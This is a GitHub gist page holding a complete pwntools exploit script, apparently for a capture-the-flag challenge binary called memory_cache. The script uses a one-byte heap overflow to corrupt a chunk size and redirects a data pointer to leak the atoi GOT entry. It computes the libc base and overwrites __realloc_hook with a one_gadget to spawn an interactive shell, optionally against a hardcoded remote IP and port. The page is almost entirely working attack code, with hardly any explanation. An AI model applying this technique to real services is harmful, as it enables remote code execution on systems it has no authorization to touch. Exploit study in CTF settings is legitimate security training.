Created
November 12, 2018 10:29
-
-
Save bongtrop/c3ad95c0324806ca900fb523c67386c2 to your computer and use it in GitHub Desktop.
full exploit memory cache
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
import time | |
REMOTE = False | |
DEBUG = False | |
if REMOTE: | |
p = remote("103.55.141.111", 2954) | |
else: | |
p = process("./memory_cache") | |
if DEBUG: | |
proc.wait_for_debugger(p.pid) | |
def set_cache(name, size, value, wait=True): | |
p.sendline("SET "+name) | |
time.sleep(0.1) | |
p.sendline(str(size)) | |
time.sleep(0.1) | |
p.sendline(value) | |
time.sleep(0.1) | |
if wait: | |
p.readuntil("OK") | |
def get_cache(name): | |
p.sendline("GET "+name) | |
front = p.readuntil(", ") | |
last = p.readline() | |
return last | |
# Wait for init | |
time.sleep(1) | |
print p.readline() | |
# align heap | |
set_cache("a", 24, "a"*24) | |
set_cache("b", 56, "b"*56) | |
set_cache("a", 56, "a"*56) | |
set_cache("c", 56, "c"*56) | |
# overflow chunk `a` size | |
set_cache("b", 57, "b"*56 + "\xff") | |
# overwrite c->data pointer to got for get got table value | |
set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(8) + p64(0x0000000000602048)) | |
leak = get_cache("c") | |
# leak got and search for libc version | |
""" | |
leak_libc = [] | |
for i in range(0, 64, 8): | |
print hex(u64(leak[i:i+8])) | |
read 0x7f95c0b91220 | |
__libc_start_main 0x7f95c0aba740 | |
SHA1_Init 0x7f95c0ecebc0 | |
free 0x7f95c0b1e4f0 | |
strlen 0x7f95c0b25720 | |
atoi 0x7f95c0ad0e80 | |
SHA1_Final 0x7f95c0ecea20 | |
strchr 0x7f95c0b23ab0 | |
""" | |
if REMOTE: | |
# libc version libc6_2.23-0ubuntu10_amd64 | |
atoi_offset = 0x036e80 | |
_realloc_hook_offset = 0x3c4b08 | |
one_gadget_offset = 0xf1147 | |
else: | |
# libc version libc6_2.27-3ubuntu1_amd64 | |
atoi_offset = 0x40680 | |
_realloc_hook_offset = 0x3ebc28 | |
one_gadget_offset = 0x10a38c | |
print "atoi addr: " + hex(u64(leak[:8])) | |
libc_base = u64(leak[:8]) - atoi_offset | |
print "base libc: " + hex(libc_base) | |
_realloc_hook_addr = libc_base + _realloc_hook_offset | |
print "__realloc_hook addr: " + hex(_realloc_hook_addr) | |
one_gadget_addr = libc_base + one_gadget_offset | |
print "one gadget addr: " + hex(one_gadget_addr) | |
# overwrite _realloc_hook to one gadget | |
set_cache("a", 112, "a"*56 + p64(0x41) + p64(0xcfc6e51e26fd662b) + p64(0x00b6ba66a47fdec8) + p64(0x00000000694ffebc) + p64(96) + p64(_realloc_hook_addr - 8 - 8 + 5)) | |
leak = get_cache("c") | |
set_cache("c", 19, leak[:11] + p64(one_gadget_addr)) | |
# trig realloc and get shell | |
set_cache("d", 1, "", False) | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment